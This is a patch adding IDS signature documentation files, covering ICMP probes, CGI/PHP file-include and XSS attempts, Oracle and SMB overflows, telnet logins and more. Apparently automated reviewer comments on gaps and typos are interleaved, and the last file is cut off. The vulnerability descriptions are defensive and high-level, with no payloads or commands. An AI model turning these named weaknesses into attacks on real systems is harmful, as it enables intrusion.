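Review bot: The "Affected Systems:" section is missing from this file; every other document in the patch has it between "Detailed Information:" and "Attack Scenarios:", and "Detailed Information:" here already names the target ("IRIX MIPS network services"), so add an entry such as "IRIX hosts on MIPS hardware running vulnerable network services". "Summary:" ("a buffer overflow attack is attempted against a target machine") should also say the rule matches a platform-specific shell code sequence, since that is what "False Negatives:" depends on. Typo: "Unkown".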
--- /dev/null
+++ b/doc/signatures/388.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+
+Sid:
+388
+
+--
+
+Summary:
+This event is generated when an ICMP Address Mask Request message is found on the network.  ICMP Address Mask Requests are used for automatically determining the 32-bit subnet mask for the network.
+
+--
+
+Impact:
+Attacks may use an ICMP address Mask Request to determine the subnet mask of the network.  This information can be used to help develope a network diagram in lue of more focused attacks.
+--
+
+Detailed Information:
+ICMP Address Mask Requests are defined in RFC 950 as the third method hosts may support for determing the address mask correspoding to its IP address.  In most implementations this method is not supported, and should not be normal traffic on most networks.  
+
+--
+
+Attack Scenarios:
+Attackers may use this ICMP Type to gather information about the subnet masks of a given network.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Address Mask Requests.
+--
+
+False Positives:
+Legitimate uses of ICMP Address Mask Requests exist.  Some hosts my implement this method as the final fall back option after static configuration and dynamic address mask configuration has failed.
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 17 should be blocked at the upstream firewall.  This type of ICMP request should never originate from a host outside of the protected network.
+--
+
+Contributors:
+Original Rule wirter unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
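Review bot: "Additional References: None" contradicts "Detailed Information:", which cites RFC 950 for the address mask mechanism; list the RFC there. "Corrective Action:" states that ICMP type 17 "should never originate from a host outside of the protected network" without the caveat that "False Positives:" gives a few lines earlier (some hosts use the request as a final fall-back after static and dynamic configuration fail); cross-reference the two so the blocking advice is not read as unconditional. Spelling: "develope", "lue" (in lieu), "determing", "correspoding", "my implement" (may), "wirter", and "Attacks may use" should be "Attackers may use".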
--- /dev/null
+++ b/doc/signatures/1304.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1304
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
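Review bot: Nothing in this file says which CGI script or request pattern the rule matches; "Summary:" and "Detailed Information:" only say "a CGI web application" and "Additional References:" is empty, so an analyst cannot tell whether a hit is relevant to their hosts. Name the script in "Summary:" and add the advisory it was written from. Typos: "ona web server" and "attackers choosing" (twice).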
--- /dev/null
+++ b/doc/signatures/1273.txt
@@ -0,0 +1,74 @@
+Rule:
+
+
+--
+Sid:
+1273
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) selection_svc is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port selection_svc is using.  Attackers can also learn what versions of the selection_svc protocol are accepted by selection_svc.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as selection_svc run.  The selection_svc RPC service is used by SunView, an old windowing system from Sun.  A vulnerability exists in selection_svc that allows a remote user to read files that are readable by SunView. 
+
+--
+Affected Systems:
+Sun SunOS 3.5
+Sun SunOS 4.0
+Sun SunOS 4.0.1
+Sun SunOS 4.0.2
+Sun SunOS 4.0.3
+Sun SunOS 4.1
+Sun SunOS 4.1.1
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where selection_svc runs.  This may be a precursor to accessing selection_svc.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access selection_svc, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for selection_svc, not probes of the selection_svc service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the selection_svc service itself. An attacker may attempt to go directly to the selection_svc port without querying the portmapper service which, would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/8
+
+CERT
+http://www.cert.org/advisories/CA-1990-05.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS25
+
+
+--
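Review bot: Misplaced comma in "False Negatives:": "without querying the portmapper service which, would not trigger the rule" should read "portmapper service, which would not trigger the rule". As with the mountd document, the SunOS 3.5 through 4.1.1 list under "Affected Systems:" describes the selection_svc file-read bug from CA-1990-05 rather than the GETPORT probe the rule detects; label it as such. Style: there is an extra blank line between "Rule:" and the first "--" separator.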
--- /dev/null
+++ b/doc/signatures/100000324.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000324
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ScozNet ScozNews" application running on a 
+webserver. Access to the file "template.php" using a remote file being passed 
+as the "main_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "main_path" parameter in the "template.php" script used 
+by the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
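Review bot: The third paragraph of "Detailed Information:" (from "This event is generated when an attempt is made to gain unauthorized access to a CGI application") and the whole of "Attack Scenarios:" are the generic credential-validation boilerplate and do not describe the remote file include via "main_path" in "template.php" that the first paragraph documents; the scenario should say that the parameter is given the location of a remote file which the script then includes. "Summary:" ends with the redundant "an exploitation attempt has been attempted". "Additional References:" is empty; cite the ScozNews advisory. Typo: "ona web server".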
--- /dev/null
+++ b/doc/signatures/2789.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2789
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure obsolete_flavor_definition
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
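Review bot: The procedure name in "Detailed Information:" is broken across lines ("obsolete_flavor_definition" / ". This procedure is included in" / "dbms_repcat."), which reads as a formatting accident; join it into one sentence: "...the procedure obsolete_flavor_definition in the dbms_repcat package." "Affected Systems:" reads "Oracle Oracle9i" (vendor duplicated). "Corrective Action:" says "patch" with no bulletin and "Additional References:" is empty; add the Oracle alert for dbms_repcat. It would also help to state whether exploitation requires an authenticated database session, as 2624.txt in this patch does for its procedure.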
--- /dev/null
+++ b/doc/signatures/100000655.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000655
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "comment" parameter in the "guestbook.php" 
+script used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
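Review bot: "Impact:" is the remote-file-include template ("system integrity compromise", "administrative access to the server", "execution of arbitrary code") and overstates a cross site scripting bug in the "comment" parameter; the consequence "Detailed Information:" and "Attack Scenarios:" actually describe is script execution in a visiting user's browser and theft of that user's information, so reword "Impact:" to that. "Affected Systems: All systems running CGI applications using MyPHP Guestbook" should just name the application. Separator style: the blank line before "--" is missing after the Sid, after "Affected Systems:" and after "Contributors:".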
--- /dev/null
+++ b/doc/signatures/1044.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+1044
+
+--
+Summary:
+This event is generated when an attempt is made to disclose the contents of a file on an Internet Information Server (IIS) host. 
+
+--
+Impact:
+Intelligence gathering activity.  This attack can display the contents of an Activer Server Page (ASP) file or other files located on the server. 
+
+--
+Detailed Information:
+A vulnerability exists in Windows NT 4.0 Option Pack and Windows 2000 Index Server.  The Index Server is a search engine used by IIS that allows a user's browser to search for text in HTML and other documents.   The Index Server has a Hit-Hightlighting component to highlight the text that satisifies the user's query.  A vulnerability exists in the webhits.dll file used to process the search, allowing the disclosure of file contents.  The .htw file extension is used by webhits.dll to perform hit-highlighting capabilities.
+
+--
+Affected Systems:
+Hosts running Microsoft Index Server 2.0
+
+--
+Attack Scenarios:
+An attacker can attempt to disclose the contents of a file by crafting a special URL to access the Hit-Highlighting component of the Index Server. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch discussed in the referenced Microsoft Bulletin.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS237
+
+Bugtraq
+http://www.securityfocus.com/bid/1084
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0302
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
+
+
+--
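Review bot: "Affected Systems:" lists only "Microsoft Index Server 2.0", but "Detailed Information:" names both the Windows NT 4.0 Option Pack and the Windows 2000 Index Server as vulnerable; list both so the scope matches the referenced MS00-006 bulletin. Spelling: "Activer Server Page", "Hit-Hightlighting", "satisifies".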
--- /dev/null
+++ b/doc/signatures/2320.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2320
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ebola from PLD Software.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible.
+
+--
+Detailed Information:
+Ebola from PLD Software is used to improve the performance of Anti-Virus
+solutions on Linux systems.
+
+A buffer overflow condition is present in the authentication mechanism
+such that it may be triggered by the generation of an error message from
+an unsuccessful authentication attempt.
+
+--
+Affected Systems:
+	All versions of Ebola prior to 0.1.5
+
+--
+Attack Scenarios:
+An attacker can send specially crafted authentication attempts to the Ebola system and
+cause the buffer overflow thus presenting the opportunity to execute
+arbitrary code.
+
+--
+Ease of Attack:
+Simple. Expoits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
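Review bot: "Corrective Action:" ("Upgrade to the latest non-affected version") should state the version boundary that "Affected Systems:" already gives, i.e. upgrade to Ebola 0.1.5 or later, so the two sections agree. "Additional References:" is empty; add the vendor or advisory link for the authentication buffer overflow. Typo: "Expoits".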
--- /dev/null
+++ b/doc/signatures/2663.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2663
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the web server of WhatsUp Gold.
+
+--
+Impact:
+A successful attack can cause a denial of service or a buffer overflow and
+the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+WhatsUp Gold is a Windows application that can be used to monitor the status
+of a network and the availability and performance of servers.  A vulnerability
+exists in the web server component of WhatsUp Gold that can cause a denial of
+service or buffer overflow and the subsequent execution of arbitrary code on a
+vulnerable server.  This can occur when an overly long value is passed to the
+parameter "instancename" when invoking the _maincfgret CGI. It should be noted
+that the web server is not enabled by default in WhatsUp Gold.
+
+--
+Affected Systems:
+WhatsUp Gold 8.x.
+
+--
+Attack Scenarios:
+An attacker can connect to a web-enabled WhatsUp Gold server and send
+an overly long value to the "instancename" when calling _maincfgret,
+possibly causing a denial of service or buffer overflow.
+
+--
+Ease of Attack:
+Denial of service - simple, buffer overflow - harder.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References
+
+Other:
+http://www.idefense.com/application/poi/display?id=133&type=vulnerabilities
+
+--
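Review bot: "Additional References" is missing its colon, unlike every other section header in this file. Since "Detailed Information:" notes that the web server component is not enabled by default, "Corrective Action:" should add disabling that component where it is not needed alongside the upgrade; and because "Affected Systems: WhatsUp Gold 8.x." gives no fixed version, "latest non-affected version" is not actionable without following the iDefense link, so state the fixed release if the advisory gives one.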
--- /dev/null
+++ b/doc/signatures/3142.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3142
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
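Review bot: "Corrective Action:" recommends "Use Samba as an alternative", which does not address the vector "Detailed Information:" describes: the vulnerability is triggered by a malicious server response to a Windows SMB client, so replacing the server with Samba leaves the affected client code untouched. Drop or rephrase that line and keep the patch and file-and-print-services advice. Style: "client - server" should be "client-server", and "windows file and print services" should be capitalized.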
--- /dev/null
+++ b/doc/signatures/2624.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2624
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "unregister_user_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "privilege_type" variable
+to cause the overflow. The result could permit the attacker to gain
+escalated privileges and run code of their choosing. This attack
+requires an attacker to logon to the database with a valid username
+and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+ 
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck94.html
+
+--
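Review bot: The "$ORACLE_PORTS" note in "Detailed Information:" is rule-deployment advice with no explanation of why "any" is needed on Windows; move it to a configuration note and state the reason. "Attack Scenarios:" names the "privilege_type" parameter while "Detailed Information:" only says "a parameter"; name it in both. Since the scenario requires a valid database logon, "Ease of Attack: Simple." should mention that authentication is a precondition. Style: "Affected Systems:" is indented with spaces where the other files use a tab.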
--- /dev/null
+++ b/doc/signatures/1900.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1900
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
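Review bot: The file never says which response the rule matches; "Summary:" and "Detailed Information:" both say only "a known response to a sucessful attack", and the middle paragraph is the generic credential-validation boilerplate that does not apply to an attack-response signature. Name the matched response, or at least the class of response, so an analyst can judge "False Positives: None known." for themselves. Spelling: "sucessful" (three times).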
--- /dev/null
+++ b/doc/signatures/716.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+716
+
+--
+Summary:
+This event is generated when a remote user successfully connects to a telnet server. 
+
+--
+Impact:
+Remote access.  This event may be an indication of a successful telnet connection by an authorized or unauthorized user. 
+
+--
+Detailed Information:
+A message is generated by a telnet server after a successful connection.  This particular event occurs when a remote user who does not belong to the internal network successfully connects to a telnet server.  This may be a legimate connection by an authorized user or a undesired connection by an unauthorized user.  Since telnet connections are not encrypted, it is possible that user accounts and passwords may be sniffed and used by attackers.  Telnet connections are not considered to be secure especially over the Internet.  Secure shell is the recommended service for remote connectivity since it uses encrypted sessions.
+
+--
+Affected Systems:
+Telnet servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to connect to a telnet server after sniffing a username and password.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+If authorized users are allowed to connect remotely using telnet, disable this rule.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+Consider using Secure Shell instead of telnet.
+
+Block inbound telnet connections if it is not required.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0619
+
+Arachnids:
+http://www.whitehats.com/info/IDS08
+
+--
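Review bot: The contributor line "Documented by Steven Alexander<alexander.s@mccd.edu>" is missing the space before the address. "False Positives:" tells the reader to "disable this rule" when telnet is authorized; since "Detailed Information:" distinguishes remote users from the internal network, suggest narrowing the source range the rule watches before disabling it entirely, so unauthorized remote logins are still reported. Spelling: "legimate", "a undesired".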
--- /dev/null
+++ b/doc/signatures/2178.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2178
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+format string vulnerability against an FTP server during authentication.
+
+--
+
+Impact:
+Attempted Admin.  A successful format string attack could result in the
+execution of arbitrary code with the same privileges as the user running
+the FTP daemon.
+
+--
+
+Detailed Information:
+Several FTP daemons are vulnerable to format string exploits during
+authentication to the FTP server.  A successful exploit attempt could 
+result in the remote attacker gaining unauthorized root access to the 
+vulnerable system.
+
+--
+Affected Systems:
+	SmallFTP v0.99
+
+--
+
+Attack Scenarios:
+A remote attacker could use a publicly available script to exploit the 
+vulnerability an gain control of the target host.
+
+--
+
+Ease of Attack:
+Simple. Numerous attack scripts exist to exploit this vulnerabiliy.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+SmallFTPD has released an updated software package that resolve the 
+problem. It can be downloaded from:
+http://smallftpd.free.fr
+
+--
+
+Contributors:
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://www.securityfocus.com/bid/7474
+
+--
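Review bot: Product naming is inconsistent: "Affected Systems:" says "SmallFTP v0.99" while "Corrective Action:" says "SmallFTPD" and links smallftpd.free.fr; use one name. "Detailed Information:" opens with "Several FTP daemons are vulnerable" yet only one product is listed, so either list the others or scope the sentence to this daemon. Grammar: "an gain control" (and), "vulnerabiliy", "package that resolve" (resolves).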
--- /dev/null
+++ b/doc/signatures/1249.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1249
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
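Review bot: "Detailed Information:" ("Many known vulnerabilities exist for this platform and the attack scenarios are legion") does not identify which FrontPage Server Extensions request the rule matches, and "Additional References:" is empty, so the file gives an analyst nothing to verify a hit against; name the matched request or component and cite its advisory. "Impact:" also adds "Denial of Service is possible" without any supporting text in the body.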
--- /dev/null
+++ b/doc/signatures/490.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+490
+
+--
+
+Summary:
+This event is generated when network traffic containing the string
+BattleMail is observed.
+
+--
+
+Impact:
+Unknown
+
+--
+
+Detailed Information:
+Email communications containing the string "BattleMail" has been
+detected in network traffic going to a mail server on the protected
+network. This may indicate participation in an email gaming system by
+the recipient.
+
+--
+
+Affected Systems:
+	All email servers
+
+--
+
+Attack Scenarios:
+Not applicable
+
+--
+
+Ease of Attack:
+Simple, no exploit software required.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Not applicable
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+Battlemail:
+http://www.thaicybersoft.com/download/internet/e-mail/BattleMail/
+
+--
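Review bot: the Ease of Attack and False Positives fields of 490.txt do not fit the rest of the document. Attack Scenarios and Corrective Action both say "Not applicable" and Impact is "Unknown", so "Ease of Attack: Simple, no exploit software required." should also be "Not applicable"; this is an informational match, not an attack. "False Positives: None known" is hard to justify for a rule that fires on "network traffic containing the string BattleMail": any message that merely mentions the product (a newsletter, a reply quoting one) will trigger it, and the field should say so. The Summary ("network traffic") and Detailed Information ("traffic going to a mail server on the protected network") also describe different scopes; use the one that matches the rule's port specification. Minor: the "-- " line before Additional References carries trailing whitespace.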
--- /dev/null
+++ b/doc/signatures/1997.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1997
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
